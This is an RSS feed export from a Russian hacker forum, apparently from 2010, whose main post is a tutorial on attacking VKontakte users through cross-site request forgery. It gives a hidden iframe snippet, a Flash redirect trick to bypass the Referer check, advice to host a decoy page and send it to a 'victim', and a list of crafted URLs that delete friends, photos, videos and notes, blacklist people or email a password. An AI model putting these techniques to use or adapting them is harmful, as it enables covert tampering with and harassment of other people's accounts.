<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xackerok.forumbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Хакерский форум</title>
		<link>http://xackerok.forumbb.ru/</link>
		<description>Хакерский форум</description>
		<language>ru-ru</language>
		<lastBuildDate>Sat, 16 Oct 2010 21:35:48 +0400</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>как взломать вконтакте</title>
			<link>http://xackerok.forumbb.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;Уязвимость позволяет производить некоторые действия вконтакте от чужого имени. &lt;br /&gt;В дальнейшем человека, от лица которого мы будем совершать эти действия, буду называть &amp;quot;жертва&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Теория&lt;/p&gt;
						&lt;p&gt;Суть уязвимости:&lt;/p&gt;
						&lt;p&gt;1. Сайт вконтакте.ру устроен таким образом, что если закрыть страницу сайта, а потом снова ее открыть, страница откроется, не запросив пароль.&lt;br /&gt;2. Сайту, как я понял, все равно каким методом мы посылаем данные из формы - GET или POST - он их обрабатывает одинакого.&lt;/p&gt;
						&lt;p&gt;Мы можем воспользоваться этим.&lt;/p&gt;
						&lt;p&gt;Сформировав определенный URL в адресной строке браузера, мы можем производить некоторые действия. &lt;br /&gt;Но, сайт не так просто сделан.&lt;/p&gt;
						&lt;p&gt;1. В некоторых формах есть скрытые поля с секретным кодом. Не зная этот код, мы ничего не сможем сделать. Но узнать его не просто, поэтому такие формы я не буду затрагивать в статье. &lt;br /&gt;2. Сайт проверяет значение $_SERVER[&#039;HTTP_REFERER&#039;], но мы обойдем эту проверку с помощью Flash. &lt;/p&gt;
						&lt;p&gt;Для того, чтобы все отработало успешно, нужно: &lt;br /&gt;1. Чтобы у жертвы в браузере был включен Flash. (У большинства людей, сидящих в этой социальной сети, он включен, т.к. без него не работают многие сервисы контакта: музыка, видео, приложения и т.д.) &lt;br /&gt;2. Чтобы жертва была залогинена вконтакте. (Большинство людей не нажимают кнопку &amp;quot;Выход&amp;quot; вконтакте, даже когда выходят из-за компа, поэтому с этим условием, думаю, проблем тоже не возникнет.)&lt;/p&gt;
						&lt;p&gt;Для примера, попробуйте ввести в адресной строке браузера в новом окне следующий URL: &lt;a href=&quot;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&lt;/a&gt;&lt;br /&gt;Вы автоматически вступили в группу &amp;quot;В Контакте | Безопасность&amp;quot;. &lt;br /&gt;Теперь выйдите из группы и попробуйте перейти по точно такой же ссылке: &lt;a href=&quot;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&lt;/a&gt; (откроется в новом окне)&lt;br /&gt;Теперь вступить в группу вам не удалось, а все по одной причине: переходя по ссылке с любого сайта, в контакт передается значение предыдущей страницы, и, в целях безопасности, он блокирует такие действия. Мы же, чуть позже, обойдем эту защиту. &lt;/p&gt;
						&lt;p&gt;Приведу еще пример - откройте в новом окне следующую страницу: &lt;a href=&quot;http://vkontakte.ru/settings.php?act=addToBlackList&amp;amp;id=1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/settings.php?act=ad &amp;#8230; t&amp;amp;id=1&lt;/a&gt;&lt;br /&gt;Вот и создатель этого сайта оказался у вас в игноре. &lt;br /&gt;Подобным образом можно совершать разные действия (их список в конце статьи) &lt;/p&gt;
						&lt;p&gt;Понятно, что если вы кинете жертве подобную ссылку, жертва поймет, в чем подвох.&lt;br /&gt;Мы же попытаемся открыть эту страницу незаметно для жертвы. &lt;/p&gt;
						&lt;p&gt;Но, прежде, чем использовать эту уязвимость на жертве, мы потренеруемся на себе. &lt;br /&gt;В примере мы создадим скрипт, добавляющий людей в ту же группу -&amp;quot;В Контакте | Безопасность&amp;quot;. &lt;br /&gt;От вас требуются элементарные знания HTML. &lt;/p&gt;
						&lt;p&gt;Выглядеть будет это так: &lt;br /&gt;Мы кидаем жертве ссылку на наш сайт. &lt;br /&gt;Жертва открывает эту ссылку. &lt;br /&gt;На сайте находится скрытый фрэйм. &lt;br /&gt;Этот фрэйм ссылается на специальный Flash-скрипт, который перенаправляет нас на все тот же адрес: &lt;a href=&quot;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=ente &amp;#8230; id=777107.&lt;/a&gt; &lt;br /&gt;Т.к. идет перенаправление через флэш, то адрес предыдущей страницы не передастся, а значит контакт выполнит наше действие. &lt;br /&gt;Когда в скрытом фрэйме откроется эта страница, жертва незаметно добавится в группу &amp;quot;В Контакте | Безопасность&amp;quot;. &lt;/p&gt;
						&lt;p&gt;Приступим? &lt;/p&gt;
						&lt;p&gt;Практика.&lt;/p&gt;
						&lt;p&gt;Шаг 1. Создаем флэшку.&lt;br /&gt;Для начала, создадим эту флэшку. &lt;br /&gt;Для ее быстрого создания я написал специальный скрипт: &lt;a href=&quot;http://swfgen.m0nster.tu2.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://swfgen.m0nster.tu2.ru&lt;/a&gt;&lt;br /&gt;Скрипт запросит у вас URL. Вводите туда &lt;a href=&quot;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=777107&lt;/a&gt; и жмите &amp;quot;ОК&amp;quot;. &lt;br /&gt;Скрипт вернет вам ссылку на готовую флэшку. &lt;br /&gt;Качаем флэшку на комп и переименовываем в более читаемый вид. Пусть будет vkontakte.swf&lt;/p&gt;
						&lt;p&gt;Шаг 2. Создаем HTML страничку.&lt;br /&gt;Теперь создаем HTML-страничку. Пусть она будет называться просто index.html. &lt;br /&gt;Пишем там любую чушь, главное, чтоб не вызвать подозрения у жертвы, что тут что-то неладное. &lt;br /&gt;Что написать на странице - дело ваше. &lt;br /&gt;После этого вставляем куда-нибудь в тело странички скрытый &amp;lt;IFRAME&amp;gt;. &lt;/p&gt;
						&lt;p&gt;&amp;lt;iframe src=&amp;quot;vkontakte.swf&amp;quot; style=&amp;quot;width:10px; height:10px; padding:0; margin:0; position:absolute; left:-100; top:-100;&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/p&gt;
						&lt;p&gt;(На этом этапе может возникнуть вопрос, почему не сделать просто display:hidden, например. А потому, что в таком случае флэш не отработает) &lt;/p&gt;
						&lt;p&gt;Шаг 3.&lt;br /&gt;Теперь у нас есть два файла: vkontakte.swf и index.html&lt;br /&gt;Регистрируем какой-нибудь сайт на бесплатном хостинге. &lt;br /&gt;Нам даже поддержка PHP не нужна, поэтому почти любой хостинг нам подойдет. &lt;br /&gt;Загружаем на свеженький сайт наши файлы. &lt;br /&gt;И попробуем открыть страничку index.html. &lt;br /&gt;Открывается страничка, ничего странного вроде не наблюдается... &lt;br /&gt;Теперь открываем нашу страницу Вконтакте и смотрим список групп - если там появилась группа &amp;quot;В Контакте | Безопасность&amp;quot;, значит, все отработало успешно. &lt;br /&gt;Можно выйти из этой группы и снова открыть нашу страницу index.html, чтобы точно удостовериться, что все работает. &lt;/p&gt;
						&lt;p&gt;Все, мы научились делать это. &lt;br /&gt;Теперь попробуем что-нибудь посложнее. &lt;br /&gt;Давайте удалим какую-нибудь фотку у друга. &lt;br /&gt;Для этого нужно знать ID фото. &lt;br /&gt;Узнать его не сложно: открываем страницу просмотра нужной(а точнее ненужной) фотографии и смотрим адрес страницы. &lt;br /&gt;Там что-то типа такого: &lt;a href=&quot;http://vkontakte.ru/photos.php?act=show&amp;amp;id=1234567_987654321.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/photos.php?act=show &amp;#8230; 987654321.&lt;/a&gt; &lt;br /&gt;В этом случае ID фото будет 1234567_987654321. Вы же делаете по аналогии. &lt;br /&gt;Когда узнали идентификатор фотографии, идем к уже знакомому скрипту, который сгенерирует нам флэшку. &lt;br /&gt;Пишем в поле URL следующий код: &lt;a href=&quot;http://vkontakte.ru/photos.php?act=do_fdelete&amp;amp;id=ИД_ФОТО&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/photos.php?act=do_f &amp;#8230; id=ИД_ФОТО&lt;/a&gt;&lt;br /&gt;Дальше все уже знакомо: переименовываем флэшку, создаем HTML страничку, там &amp;lt;IFRAME&amp;gt;, ссылающийся на нашу флэшку. &lt;br /&gt;Теперь кидаем ссылку на нашу страничку другу, и, если друг нажмет на ссылку, то фока у него должна исчезнуть. &lt;/p&gt;
						&lt;p&gt;Думаю, принцип вы поняли. &lt;br /&gt;Теперь приведу список возможных действий, и требующийся для них URL. &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/settings.php?act=addToBlackList&amp;amp;id=ИД&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/settings.php?act=ad &amp;#8230; &amp;amp;id=ИД&lt;/a&gt; &lt;br /&gt;Добавить человека в черный список&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/friend.php?act=do_delete&amp;amp;id=ИД&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/friend.php?act=do_delete&amp;amp;id=ИД&lt;/a&gt; &lt;br /&gt;Удалить друга&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/groups.php?act=enter&amp;amp;gid=ИД_ГРУППЫ&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=ente &amp;#8230; =ИД_ГРУППЫ&lt;/a&gt; &lt;br /&gt;Вступить в группу&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/groups.php?act=leave&amp;amp;gid=ИД_ГРУППЫ&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/groups.php?act=leav &amp;#8230; =ИД_ГРУППЫ&lt;/a&gt; &lt;br /&gt;Покинуть группу &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/notes.php?act=do_delete&amp;amp;nid=ИД_ЗАМЕТКИ&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/notes.php?act=do_de &amp;#8230; ИД_ЗАМЕТКИ&lt;/a&gt; &lt;br /&gt;Удалить заметку&lt;/p&gt;
						&lt;p&gt;Редактировать заметку&lt;br /&gt;ИД заметки можно узнать из url при просмотре заметки. &lt;br /&gt;visible - кто может просматривать заметку. commentable - кто может комментировать &lt;br /&gt;могут принимать следующие значения: &lt;br /&gt;0 - все &lt;br /&gt;1 - Друзья и друзья друзей &lt;br /&gt;2 - Только друзья &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/video.php?act=do_delete&amp;amp;oid=ИД&amp;amp;id=ИД_ВИДЕО&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/video.php?act=do_de &amp;#8230; d=ИД_ВИДЕО&lt;/a&gt; &lt;br /&gt;Удалить видео&lt;br /&gt;(ИД_ВИДЕО можно узнать из url при просмотре видео) &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/photos.php?act=do_fdelete&amp;amp;id=ИД_ФОТО&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/photos.php?act=do_f &amp;#8230; id=ИД_ФОТО&lt;/a&gt; &lt;br /&gt;Удалить фото&lt;br /&gt;(узнать ид фото можно из url при просмотре фото.) &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://vkontakte.ru/settings.php?act=send&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/settings.php?act=send&lt;/a&gt; &lt;br /&gt;Выслать на почту жертвы письмо с её паролем&lt;/p&gt;
						&lt;p&gt;Источник:http://xackerok.forumbb.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (hacksonik)</author>
			<pubDate>Sat, 16 Oct 2010 21:35:48 +0400</pubDate>
			<guid>http://xackerok.forumbb.ru/viewtopic.php?pid=2#p2</guid>
		</item>
		<item>
			<title>Тестовое сообщение</title>
			<link>http://xackerok.forumbb.ru/viewtopic.php?pid=1#p1</link>
			<description>&lt;p&gt;Благодарим за выбор нашего сервиса!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (hacksonik)</author>
			<pubDate>Sat, 16 Oct 2010 20:07:13 +0400</pubDate>
			<guid>http://xackerok.forumbb.ru/viewtopic.php?pid=1#p1</guid>
		</item>
	</channel>
</rss>
